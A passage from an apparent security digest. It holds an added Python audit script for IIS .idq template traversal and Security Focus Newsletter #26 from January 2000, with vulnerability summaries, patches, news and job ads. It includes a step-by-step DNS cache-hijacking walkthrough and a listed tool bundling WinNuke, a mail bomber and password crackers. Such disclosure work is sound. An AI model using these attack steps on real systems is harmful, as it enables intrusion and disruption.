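An added example (not from the Cerberus advisory or from Microsoft): Python that classifies the CiTemplate line of an .idq file by the advisory's rules for an unpatched and a patched server, and applies the recommended hardcoded-template fix. The .idq texts are constructed, modelled on the forms quoted above; a real audit would read every .idq under the web root.

```python
"""Classify the CiTemplate line of IIS Internet Data Query (.idq) files.

Added example; not code from the Cerberus advisory or from Microsoft.
The rules are the advisory's: without the "webhits" patch any %Variable%
in CiTemplate is exploitable; with the patch installed only a template
that is not forced to end in .htx is. The sample .idq texts are constructed.
"""
import re

# A %Name% token is filled in from the request, i.e. from remote user input.
VARIABLE_RE = re.compile(r"%[A-Za-z_][A-Za-z0-9_]*%")
# First CiTemplate= line in the file; value trimmed of surrounding blanks.
CITEMPLATE_RE = re.compile(
    r"^[ \t]*CiTemplate[ \t]*=[ \t]*(?P<value>[^\r\n]*?)[ \t]*$",
    re.IGNORECASE | re.MULTILINE)

# Constructed samples modelled on the three forms quoted in the advisory.
IDQ_BARE = "[Query]\nCiRestriction=%CiRestriction%\nCiTemplate=%TemplateName%\n"
IDQ_FORCED_HTX = "[Query]\nCiTemplate=/iissamples/issamples/%TemplateName%.htx\n"
IDQ_HARDCODED = "[Query]\nCiTemplate=/iissamples/issamples/query.htx\n"


def classify_idq(idq_text, webhits_patch_installed):
    """Return (status, reason); status is 'safe', 'vulnerable' or 'no-template'."""
    m = CITEMPLATE_RE.search(idq_text)
    if not m:
        return ("no-template", "no CiTemplate line found")
    value = m.group("value")
    if not VARIABLE_RE.search(value):
        return ("safe", "template path is hardcoded: " + value)
    if not webhits_patch_installed:
        # Unpatched idq.dll follows '..' in the template path, and a forced
        # .htx suffix can be pushed past the 260-character path limit, so
        # any remote-controlled part of the path is exploitable.
        return ("vulnerable", "remote input in template path on an unpatched server")
    if value.lower().endswith(".htx"):
        return ("safe", "patched server and template forced to .htx")
    return ("vulnerable", "patched server but template is not forced to .htx")


def harden_idq(idq_text, fixed_template):
    """Apply the advisory's fix: replace the CiTemplate value with a fixed path."""
    if VARIABLE_RE.search(fixed_template):
        raise ValueError("replacement template must not contain %Variable% tokens")
    return CITEMPLATE_RE.sub(lambda _m: "CiTemplate=" + fixed_template,
                             idq_text, count=1)


def audit(files, webhits_patch_installed):
    """Return {path: status} for a mapping of .idq path -> file text."""
    return {path: classify_idq(text, webhits_patch_installed)[0]
            for path, text in files.items()}


if __name__ == "__main__":
    samples = {"query.idq": IDQ_HARDCODED, "fastq.idq": IDQ_FORCED_HTX,
               "search.idq": IDQ_BARE}
    for patched in (False, True):
        print("webhits patch installed:", patched, audit(samples, patched))
    print(harden_idq(IDQ_BARE, "/search/results.htx"))
```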
@HWA

34.0 Security Focus Newsletter #26
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security Focus Newsletter #26

Table of Contents:

I. INTRODUCTION
II. BUGTRAQ SUMMARY
   1. Multiple Vendor BSD /proc File System Vulnerability
   2. DNS TLD & Out of Zone NS Domain Hijacking
   3. Inter7 vpopmail (vchkpw) Buffer Overflow Vulnerability
   4. VMware Symlink Vulnerability
   5. HP Path MTU Discovery DoS Vulnerability
   6. Microsoft East Asian Word Conversion Vulnerability
   7. NT RDISK Registry Enumeration File Vulnerability
   8. Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability
   9. NT Index Server Directory Traversal Vulnerability
III. PATCH UPDATES
   1. Vulnerability Patched: Qualcomm qpopper 'LIST' Buffer Overflow
   2. Vulnerability Patched: NT Index Server Directory Traversal
   3. Vulnerability Patched: Multiple Vendor BSD /proc File System
   4. Vulnerability Patched: Multiple Vendor BSD /proc File System
   5. Vulnerability Patched: Inter7 vpopmail (vchkpw) Buffer Overflow
   6. Vulnerability Patched: NT RDISK Registry Enumeration File
   7. Vulnerability Patched: Microsoft East Asian Word Conversion
   8. Vulnerability Patched: Multiple Vendor BSD make /tmp Race
IV. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES
   1. Outpost Leaves Data Unguarded (Mon Jan 24 2000)
   2. Japan Says to Seek U.S. Help to Deal With Hackers (Tue Jan 25 2000)
   3. Task Force Battles Online Criminals (Wed Jan 26 2000)
   4. Smart card 'inventor' lands in jail (Thu Jan 27 2000)
   5. Visa acknowledges cracker break-ins (Fri Jan 28 2000)
   6. A Year Of Mass-Mailing Viruses (Fri Jan 28 2000)
V. INCIDENTS SUMMARY
   1. Got scanned again (Thread)
   2. Unusual scan pattern (Thread)
   3. Possible Probe = Possible Malfunction (Thread)
   4. No Idea (Thread)
   5. PC Anywhere client seems to probe class C of connected networks (Thread)
   6. unapproved AXFR (Thread)
   7. Connect thru PIX & ports 1727, 2209, 9200 (Thread)
   8. Anti-Death Penalty (Thread)
   9. Strange DNS/TCP activity (Thread)
  10. eri? (Thread)
  11. source port 321 (Thread)
  12. Korea (again) (Thread)
  13. BOGUS.IvCD File (Thread)
  14. port 768 (Thread)
  15. Extrange named messages (Thread)
  16. Probes to tcp 2766 ('System V Listner') (Thread)
  17. Possible attempt at hacking? (Thread)
  18. DNS update queries: another sort of suspicious activity. (Thread)
VI. VULN-DEV RESEARCH LIST SUMMARY
   1. Shadow (Thread)
   2. things to break.. (Thread)
   3. HTTP scanners? (summary, long) (Thread)
   4. CGI insecurities (Thread)
   5. ICQ Pass Cracker. (Thread)
   6. File Share Vacuum (Thread)
   7. IIS4.0 .htw vulnerability (Thread)
   8. Napster a little insecure? (Thread)
   9. distributed.net and seti@home (Thread)
VII. SECURITY JOBS
   Seeking Employment:
   1. Prashant Vijay (Summer Internship) <vijay@eecs.tulane.edu>
   Seeking Staff:
   1. Security Research Engineer (Atlanta, Ga)
   2. Practice Manager w/PKI experience (NYC, Philly or DC)
   3. Lead Security Engineer - Bay Area/San Jose
   4. Senior security engineers - Bay Area/San Jose
   5. Virus coder wanted (San Antonio, TX)
   6. Junior Security Engineers Needed (Maryland)
VIII. SECURITY SURVEY RESULTS
IX. SECURITY FOCUS TOP 6 TOOLS
   1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT)
   2. SecurityFocus.com Pager (Win95/98/NT)
   3. lidentd 1.0p1 (Linux)
   4. Cgi Sonar 1.0 (any system supporting perl)
   5. Logcheck 1.1.1 (BSDI, Digital UNIX/Alpha, FreeBSD, HP-UX, Linux, NetBSD, OpenBSD, Solaris and SunOS)
   6. Secret Sharer 1.0 (Windows 95/98)
X. SPONSOR INFORMATION - CORE SDI http://www.core-sdi.com
XI. SUBSCRIBE/UNSUBSCRIBE INFORMATION

I. INTRODUCTION
-----------------

Welcome to the SecurityFocus.com 'week in review' newsletter issue 26 for the time period of 2000-01-24 to 2000-01-30 sponsored by CORE SDI.

CORE SDI is an international computer security research and development company. Its clients include 3 of the Big 5 chartered accountant firms for whom CORE SDI develops customized security auditing tools as well as several notable computer security product vendors, such as Network Associates. In addition to providing 'consultant to the consultant' services CORE also performs risk assessment and security infrastructure consulting for a large number of government and fortune 500 companies in both North and Latin America.

http://www.core-sdi.com

II. BUGTRAQ SUMMARY 2000-01-24 to 2000-01-30
---------------------------------------------

1. Multiple Vendor BSD /proc File System Vulnerability
BugTraq ID: 940
Remote: No
Date Published: 2000-01-21
Relevant URL: http://www.securityfocus.com/bid/940
Summary:
Certain BSD derivative operating systems use an implementation of the /proc filesystem which is vulnerable to attack from malicious local users. This attack will gain the user root access to the host. The proc file system was originally designed to allow easy access to information about processes (hence the name). Its typical benefit is quicker access to memory, hence more streamlined operations. As noted previously certain implementations have a serious vulnerability. In short, the vulnerability is that users may manipulate processes under systems which use /proc to gain root privileges. The full details are covered at length in the advisory attached to the 'Credit' section of this vulnerability entry.

2. DNS TLD & Out of Zone NS Domain Hijacking
BugTraq ID: 941
Remote: Yes
Date Published: 2000-01-23
Relevant URL: http://www.securityfocus.com/bid/941
Summary:
A vulnerability exists in the mechanism used by DNS, in general, to determine the name server associated with TLD's (top level domains). DNS is built upon levels of trust, and by exploiting single points of failure in this trust system, it becomes possible for an attacker to convince a caching nameserver that allows for recursion through it that the root server for a given TLD is something other than what it actually is. By consecutively performing these cache attacks, it could be possible for an attacker to entirely take over name service for any given domain.

The vulnerability is actually not specific to TLD's. The same attack can be used to hijack any domain which has out of zone NS records, if any of the servers that act as the name server for the out of zone domain can be compromised.

The simplest explanation was presented in the example provided by its discoverer, Dan Bernstein, on the Bugtraq mailing list, on January 23, 2000:

"Suppose an attacker can make recursive queries through your cache. Let me emphasize that this does not mean that the attacker is one of your beloved users; many programs act as DNS query-tunneling tools. Suppose the attacker is also able, somehow, to take over ns2.netsol.com. This isn't one of the .com servers, but it's a name server for the gtld-servers.net domain. Here's what happens:

(1) The attacker asks your cache about z.com. Your cache contacts (say) k.root-servers.net, which provides a referral:

   com NS j.gtld-servers.net (among others)
   j.gtld-servers.net A 198.41.0.21

These records are cached.

(2) The attacker asks your cache about z.gtld-servers.net. Your cache contacts (say) f.root-servers.net, which provides a referral:

   gtld-servers.net NS ns2.netsol.com (among others)
   ns2.netsol.com A 207.159.77.19

These records are cached.

(3) The attacker takes over ns2.netsol.com.

(4) The attacker asks your cache about zz.gtld-servers.net. Your cache contacts ns2.netsol.com, and the attacker answers:

   zz.gtld-servers.net CNAME j.gtld-servers.net
   j.gtld-servers.net A 1.2.3.4

These records are cached, wiping out the obsolete j glue.

(5) A legitimate user asks your cache about yahoo.com. Your cache contacts j.gtld-servers.net, and the attacker answers:

   yahoo.com A 1.2.3.4

The user contacts yahoo.com at that address."

The attack offered requires that an attacker be able to compromise the operation of the DNS server running on, in this case, ns2.netsol.com, although this is not the only server that could potentially be used to launch an attack of this style. The author further indicates that there are in excess of 200 servers that could be used to manipulate resolution of all the .COM domains.

3. Inter7 vpopmail (vchkpw) Buffer Overflow Vulnerability
BugTraq ID: 942
Remote: Yes
Date Published: 2000-01-21
Relevant URL: http://www.securityfocus.com/bid/942
Summary:
Vpopmail (vchkpw) is a free GPL software package built to help manage virtual domains and non /etc/passwd email accounts on Qmail mail servers. This package is developed by Inter7 (Referenced in the 'Credit' section) and is not shipped, maintained or supported by the main Qmail distribution. Certain versions of this software are vulnerable to a remote buffer overflow attack in the password authentication of vpopmail.

4. VMware Symlink Vulnerability
BugTraq ID: 943
Remote: No
Date Published: 2000-01-21
Relevant URL: http://www.securityfocus.com/bid/943
Summary:
VMware is software that runs multiple virtual computers on a single PC, at the same time, without partitioning or rebooting. Certain versions of the VMWare for Linux product do not perform /tmp file sanity checking and create files in the /tmp directory which will follow symlinks. This may be used by a malicious user to overwrite any file (with log data) which falls within the write permissions of the user ID which VMWare executes as. Typically this is root. This attack will most likely result in a denial of service and not a root level compromise.

5. HP Path MTU Discovery DoS Vulnerability
BugTraq ID: 944
Remote: Yes
Date Published: 2000-01-24
Relevant URL: http://www.securityfocus.com/bid/944
Summary:
A potential denial of service exists in Hewlett-Packard's proprietary protocol for discovering the maximum path MTU (PMTU) for a given connection. This feature could potentially be used to cause denial of services, using HPUX machines as "amplifiers." Essentially, HP machines which are vulnerable can, under certain conditions, be coerced in to sending far more data outbound than they receive inbound. By forging source addresses, it is possible to send a small quantity of packets purporting to be from a given source, and cause the HPUX machine to send multiple packets in response. This could potentially be used as a denial of service. HP's proprietary path discovery protocol works by sending data in parallel with ICMP packets being used for path discovery. While exact details of the nature of the denial of service were not made public, presumably it could be possible to utilize UDP packets, and default UDP services to start the chain of events leading to a denial of service.

6. Microsoft East Asian Word Conversion Vulnerability
BugTraq ID: 946
Remote: No
Date Published: 2000-01-20
Relevant URL: http://www.securityfocus.com/bid/946
Summary:
East Asian language versions of Word and Powerpoint are susceptible to a buffer overflow exploit. The overflowable buffer is in the code that converts Word 5 documents into newer formats. Word 97, 98, and 2000 will automatically convert older files into the new format upon loading. If a specially-modified Chinese, Japanese or Korean Word 5 document is loaded into a newer version of Word or PowerPoint, arbitrary code can be executed during the conversion process, at the privilege level of the current user.

7. NT RDISK Registry Enumeration File Vulnerability
BugTraq ID: 947
Remote: No
Date Published: 2000-01-21
Relevant URL: http://www.securityfocus.com/bid/947
Summary:
The Rdisk utility shipped with all versions of Windows NT4.0 is used to make an Emergency Repair Disk. During the creation of this disk, a temporary file ($$hive$$.tmp) is created in the %systemroot%\repair directory that contains the registry hives while they are being backed up. The group Everyone has Read permission to this file, and in this manner sensitive information about the server could be leaked. The file is put in a location that is not shared by default, and is removed immediately after the disk is created. The only likely scenario where this could be exploited is in the case of NT Terminal Server, where an administrator and a regular user could both be logged in interactively at the same time.

8. Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability
BugTraq ID: 948
Remote: Yes
Date Published: 2000-01-26
Relevant URL: http://www.securityfocus.com/bid/948
Summary:
There is a remotely exploitable buffer overflow in Qualcomm's 'qpopper' daemon which allows users already in possession of a username and password for a POP account to compromise the server running the qpopper daemon. The problem lies in the code that handles the 'LIST' command available to logged in users. By providing an overly long user supplied argument a buffer may be overflowed resulting in the attacker gaining access with the user ID (UID) of the user whose account is being used for the attack and the group ID (GID) mail. This will result in remote access to the server itself and possibly (depending on how the machine is configured) access to read system users' mail via the GID mail.

9. NT Index Server Directory Traversal Vulnerability
BugTraq ID: 950
Remote: Yes
Date Published: 2000-01-26
Relevant URL: http://www.securityfocus.com/bid/950
Summary:
Index Server 2.0 is a utility included in the NT 4.0 Option Pack. The functionality provided by Index Service has been built into Windows 2000 as Indexing Services. When combined with IIS, Index Server and Indexing Services include the ability to view web search results in their original context. It will generate an html page showing the query terms in a short excerpt of the surrounding text for each page returned, along with a link to that page. This is known as "Hit Highlighting". To do this, it supports the .htw filetype which is handled by the webhits.dll ISAPI application. This dll will allow the use of the '../' directory traversal string in the selection of a template file. This will allow for remote, unauthenticated viewing of any file on the system whose location is known by the attacker.

III. PATCH UPDATES 2000-01-24 to 2000-01-30
-------------------------------------------

1. Vendor: Qualcomm
Product: Qpopper
Vulnerability Patched: Qualcomm qpopper 'LIST' Buffer Overflow
Bugtraq ID: 948
Relevant URLS:
http://www.eudora.com/freeware/qpop.html#BUFFER
http://www.securityfocus.com/bid/948
Patch Location:
ftp://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper3.0b31.tar.Z

2. Vendor: Microsoft
Product: Index Server for Windows NT and 2000
Vulnerability Patched: NT Index Server Directory Traversal
Bugtraq ID: 950
Relevant URLS:
http://www.microsoft.com/security
http://www.securityfocus.com/bid/950
Patch Locations:
Index Server 2.0:
Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Indexing Services for Windows 2000:
Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726

3. Vendor: OpenBSD
Product: OpenBSD
Vulnerability Patched: Multiple Vendor BSD /proc File System
Bugtraq ID: 940
Relevant URLS:
http://www.openbsd.org/errata.html
http://www.securityfocus.com/bid/940
Patch Location:
http://www.openbsd.org/errata.html#procfs

4. Vendor: FreeBSD
Product: FreeBSD
Vulnerability Patched: Multiple Vendor BSD /proc File System
Bugtraq ID: 940
Relevant URLS:
http://www.freebsd.org/security/
http://www.securityfocus.com/bid/940
Patch Location:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:02/procfs.patch

5. Vendor: Inter7
Product: vpopmail
Vulnerability Patched: Inter7 vpopmail (vchkpw) Buffer Overflow
Bugtraq ID: 942
Relevant URLS:
http://www.inter7.com/
http://www.securityfocus.com/bid/942
Patch Location:
http://www.inter7.com/vpopmail/ (version 3.1.11e)

6. Vendor: Microsoft
Product: NT 4.0 Terminal Server Edition
Vulnerability Patched: NT RDISK Registry Enumeration File
Bugtraq ID: 947
Relevant URLS:
http://www.microsoft.com/security
http://www.securityfocus.com/bid/947
Patch Location:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17384

7. Vendor: Microsoft
Product: Office (All versions, including word and powerpoint)
Vulnerability Patched: Microsoft East Asian Word Conversion
Bugtraq ID: 946
Relevant URLS:
http://www.microsoft.com/security
http://www.securityfocus.com/bid/946
Patch Locations:
- Word 97 or 98, PowerPoint 98:
  US: http://officeupdate.microsoft.com/downloaddetails/ww5pkg.htm
  Japan: http://officeupdate.microsoft.com/japan/downloaddetails/MalformedData-97.htm
  Korea: http://officeupdate.microsoft.com/korea/downloaddetails/MalformedData-97.htm
  China: http://officeupdate.microsoft.com/china/downloaddetails/MalformedData-97.htm
  Taiwan: http://officeupdate.microsoft.com/taiwan/downloaddetails/MalformedData-97.htm
  Hong Kong: http://officeupdate.microsoft.com/hk/downloaddetails/MalformedData-97.htm
- Converter Pack 2000; Office 2000 with Multilanguage Pack; Word 2000, PowerPoint 2000:
  US: http://officeupdate.microsoft.com/2000/downloaddetails/ww5pkg.htm
  Japan: http://officeupdate.microsoft.com/japan/downloaddetails/2000/MalformedData-2K.htm
  Korea: http://officeupdate.microsoft.com/korea/downloaddetails/2000/MalformedData-2K.htm
  China: http://officeupdate.microsoft.com/china/downloaddetails/2000/MalformedData-2K.htm
  Taiwan: http://officeupdate.microsoft.com/taiwan/downloaddetails/2000/MalformedData-2K.htm
  Hong Kong: http://officeupdate.microsoft.com/hk/downloaddetails/2000/MalformedData-2K.htm

8. Vendor: FreeBSD
Product: FreeBSD
Vulnerability Patched: Multiple Vendor BSD make /tmp Race Condition
Bugtraq ID: 939
Relevant URLS:
http://www.freebsd.org/security
http://www.securityfocus.com/bid/939
Patch locations:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:01/make.patch

IV. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES
-----------------------------------------

1. Outpost Leaves Data Unguarded (Mon Jan 24 2000)
Excerpt: While James Wynne was checking his online order Friday at Outpost.com, he noticed something curious -- he could check orders from other people, too.
Relevant URL: http://www.wired.com/news/technology/0,1282,33842,00.html

2. Japan Says to Seek U.S. Help to Deal With Hackers (Tue Jan 25 2000)
Excerpt: Japan said on Tuesday it will seek help from the United States in an investigation into hackers who penetrated two government Web sites.
Relevant URL: http://news.excite.com/news/r/000125/00/net-japan-hackers

3. Task Force Battles Online Criminals (Wed Jan 26 2000)
Excerpt: Ground zero in California's war against Internet crime is behind a dumpster hard by a hamburger stand in a faded Sacramento County welfare building. This is the headquarters of the Sacramento Valley high-tech task force, a multi-agency law enforcement team dedicated to tracking down e-crime, from stock swindlers to child pornographers.
Relevant URL: http://www.latimes.com/news/asection/20000126/t000008196.html

4. Smart card 'inventor' lands in jail (Thu Jan 27 2000)
Excerpt: In another case destined to fuel e-commerce anxieties, a Parisian computer programmer is facing counterfeiting and fraud charges after developing a homemade "smart card" that he says gave him the ability to fraudulently purchase goods and services throughout France.
Relevant URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2428429,00.html?chkpt=zdnnstop

5. Visa acknowledges cracker break-ins (Fri Jan 28 2000)
Excerpt: Visa International Inc. acknowledged this week that computer crackers broke into several servers in its global network last July and stole information. The company said that in December, it received a phone call and an e-mail demanding money in exchange for the data.
Relevant URL: http://www.computerworld.com/home/print.nsf/all/000128e45a

6. A Year Of Mass-Mailing Viruses (Fri Jan 28 2000)
Excerpt: In its review of the last 12 months, Sophos, the IT security firm, says that 1999 turned out to be a year when mass-mailed viruses arrived and dominated the scene. The annual review says that virus writers are now taking advantage of the Internet and corporate e-mail systems to distribute their creations more quickly.
Relevant URL: http://www.currents.net/newstoday/00/01/28/news8.html

V. INCIDENTS SUMMARY 2000-01-24 to 2000-01-30
---------------------------------------------

1. Got scanned again (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=388C09A6.8EB8CC47@scalajwt.ro

2. Unusual scan pattern (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=SIMEON.10001241252.G29957@bluebottle.itss

3. Possible Probe = Possible Malfunction (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3.0.3.32.20000125180337.008613b0@mail.9netave.com

4. No Idea (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3926668584.948819473@pc27233.utdallas.edu

5. PC Anywhere client seems to probe class C of connected networks (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.GSO.4.21.0001251657260.10263-100000@barrel.dt.ecosoft.com

6. unapproved AXFR (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=SIMEON.10001251742.C24564@bluebottle.itss

7. Connect thru PIX & ports 1727, 2209, 9200 (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=D6C7B533F7C4D311BBD800001D121E7F0151D2@clmail.cmccontrols.com

8. Anti-Death Penalty (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.LNX.4.10.10001271722320.19098-100000@wr5z.localdomain

9. Strange DNS/TCP activity (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=20000127205611.23795.qmail@securityfocus.com

10. eri? (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=200001281146.FAA20359@hank.cs.utexas.edu

11. source port 321 (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=25608573.949079326302.JavaMail.imail@cheeks.excite.com

12. Korea (again) (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=20000128080948.A24408@sec.sprint.net

13. BOGUS.IvCD File (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=389071D7.6A217C7C@relaygroup.com

14. port 768 (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=87u2jyvahi.fsf@wiz.wiz

15. Extrange named messages (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3.0.6.32.20000128103026.009ab760@mail.inforeti

16. Probes to tcp 2766 ('System V Listner') (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.LNX.4.10.10001281650150.29437-100000@unreal.sekure.org

17. Possible attempt at hacking? (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=004701bf6934$22f4fd00$6500a8c0@techstart.com.au

18. DNS update queries: another sort of suspicious activity. (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.GSO.4.05.10001281604430.24882-100000@ns.kyrnet.kg

VI. VULN-DEV RESEARCH LIST SUMMARY 2000-01-24 to 2000-01-30
----------------------------------------------------------

1. Shadow (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.GSO.4.21.0001250033010.7776-100000@stormbringer.eos.ncsu.edu

2. things to break.. (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.BSF.4.05.10001251139570.30155-100000@mail.us.netect.com

3. HTTP scanners? (summary, long) (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=388FD01F.A28F15BC@thievco.com

4. CGI insecurities (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.GSO.4.10.10001271034400.25323-100000@analog.rm-r.net

5. ICQ Pass Cracker. (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=200001270941.UAA21537@buffy.tpgi.com.au

6. File Share Vacuum (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=18708.000128@frisurf.no

7. IIS4.0 .htw vulnerability (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=4C95EE93836DD311AAA200805FED978904F2DB@mercury.globalintegrity.com

8. Napster a little insecure? (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=4.2.0.58.20000128171020.009c8ee0@mail.openline.com.br

9. distributed.net and seti@home (Thread)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=NDBBJPBMKLJJBCHBNEAIKECOCBAA.jlintz@optonline.net

VII. SECURITY JOBS SUMMARY 2000-01-24 to 2000-01-30
---------------------------------------------------

Seeking Employment:

1. Prashant Vijay (Summer Internship) <vijay@eecs.tulane.edu>
Resume at: http://www.securityfocus.com/templates/archive.pike?list=77&msg=NDBBJEJEALCFECNEOEHPMEKBCAAA.vijay@eecs.tulane.edu&part=.1

Seeking Staff:

1. Security Research Engineer (Atlanta, Ga)
Reply to: Samuel Cure <scure@iss.net>
Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=20000124212259.7741.qmail@securityfocus.com

2. Practice Manager w/PKI experience (NYC, Philly or DC)
Reply to: Erik Voss <evoss@mrsaratoga.com>
Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=00d201bf6832$f9cd5460$6775010a@saratoga3

3. Lead Security Engineer - Bay Area/San Jose
Reply to: Sanjeev Kumar <sakumar@zambeel.com>
Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=20000127015859.1308.qmail@securityfocus.com

4. Senior security engineers - Bay Area/San Jose
Reply to: Erik Voss <evoss@mrsaratoga.com>
Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=20000127020135.1478.qmail@securityfocus.com

5. Virus coder wanted (San Antonio, TX)
Reply to: Drissel, James W. <james.drissel@cmet.af.mil>
Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=CD11F9F59C6BD3118BF5009027B0F53B0884EC@adp-exch-1.cmet.af.mil

6. Junior Security Engineers Needed (Maryland)
Reply to: Brian Mitchell <bmitchell@icscorp.com>
Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=NCBBKIMIMKKMLDMGEHFKAEAKENAA.bmitchell@icscorp.com

VIII. SECURITY SURVEY 2000-01-24 to 2000-01-30
----------------------------------------------

Our current month long survey is:

"Do you think security vendors exaggerate the importance of security issues as a marketing strategy?"

Never    6% / 10 votes
Rarely  30% / 48 votes
Often   47% / 74 votes
Always  14% / 23 votes

Total number of votes: 155 votes

IX. SECURITY FOCUS TOP 6 TOOLS 2000-01-24 to 2000-01-30
--------------------------------------------------------

1.
ShadowScan 1.00.093 (Windows 95/98 and Windows NT) by RedShadow Relevant URL: http://www.rsh.kiev.ua Shadow Advantis Administator Tools - Ping (SSPing), Port Scanner, , IP Scanner, Site Info (is intended for fast definition of services started on the host), Network Port Scanner,Tracert, Telnet,Nslookup, Finger,Echo,Time,UPD test,File Info, Compare File, Netstat, SysInfo,Crypt, Crc File, DBF view/edit, DiskInfo, NTprocess, Keyboard test, DNS info Shadow Hack and Crack - WinNuke, Mail Bomber,POP3,HTTP,SOCKS,FTP Crack (definitions of the password by a method of search),Unix password Crack, Finger over SendMail, Buffer Overlow , Smb Password Check , CRK Files ShadowPortGuard - code for detection of connection on the certain port Shadow Novell NetWare Crack - code for breakings Novell NetWare 4.x And more other functions 2. SecurityFocus.com Pager (Win95/98/NT) by SecurityFocus.com Relevant URL: http://www.securityfocus.com/pager/sf_pgr20.zip This program allows the user to monitor additions to the Security Focus website without constantly maintaining an open browser. Sitting quietly in the background, it polls the website at a user-specified interval and alerts the user via a blinking icon in the system tray, a popup message or both (also user-configurable). 3. lidentd 1.0p1 (Linux) by Drago, drago@drago.com Relevant URL: http://www.securityfocus.com/data/tools/lidentd-v1.0p1.tgz lidentd is an identd replacement with many features including fake users, random fake users , restricted fake user responses, matching against the passwd file for fake responses and more. 4. Cgi Sonar 1.0 (any system supporting perl) by M.e.s.s.i.a.h Relevant URL: http://www.securityfocus.com/data/tools/CgiSonar.pl.gz 5. Logcheck 1.1.1 (BSDI, Digital UNIX/Alpha, FreeBSD, HP-UX, Linux, NetBSD, OpenBSD, Solaris and SunOS) by Craig Rowland, crowland@psionic.com Relevant URL: http://www.securityfocus.com/data/tools/logcheck-1.1.1.tar.gz Logcheck is part of the Abacus Project of security tools. 
It is a program created to help in the processing of UNIX system logfiles generated by the various Abacus Project tools, system daemons, Wietse Venema's TCP Wrapper and Log Daemon packages, and the Firewall Toolkit by Trusted Information Systems Inc. (TIS). Logcheck also works very well at reporting on other common operating system security violations and strange events.

6. Secret Sharer 1.0 (Windows 95/98)
by Joel McNamara, joelm@eskimo.com
Relevant URL:
http://www.securityfocus.com/data/tools/secs.zip

Secret Sharer is designed to help people keep secure back-up copies of sensitive data such as PGP (or other cryptosystem) passphrases and confidential files.

X. SPONSOR INFORMATION - CORE SDI
------------------------------------------
CORE SDI is an international computer security research and development company. Its clients include 3 of the Big 5 chartered accountant firms, for whom CORE SDI develops customized security auditing tools, as well as several notable computer security product vendors, such as Network Associates. In addition to providing 'consultant to the consultant' services CORE also performs risk assessment and security infrastructure consulting for a large number of government and Fortune 500 companies in both North and Latin America.

URL: http://www.core-sdi.com

XI. SUBSCRIBE/UNSUBSCRIBE INFORMATION
-------------------------------------
1. How do I subscribe?
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body of:
SUBSCRIBE SF-NEWS Lastname, Firstname
You will receive a confirmation request message to which you will have to answer.

2. How do I unsubscribe?
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed address with a message body of:
UNSUBSCRIBE SF-NEWS
If your email address has changed email aleph1@securityfocus.com and I will manually remove you.

3. How do I disable mail delivery temporarily?
If you are simply going on vacation you can turn off mail delivery without unsubscribing by sending LISTSERV the command:
SET SF-NEWS NOMAIL
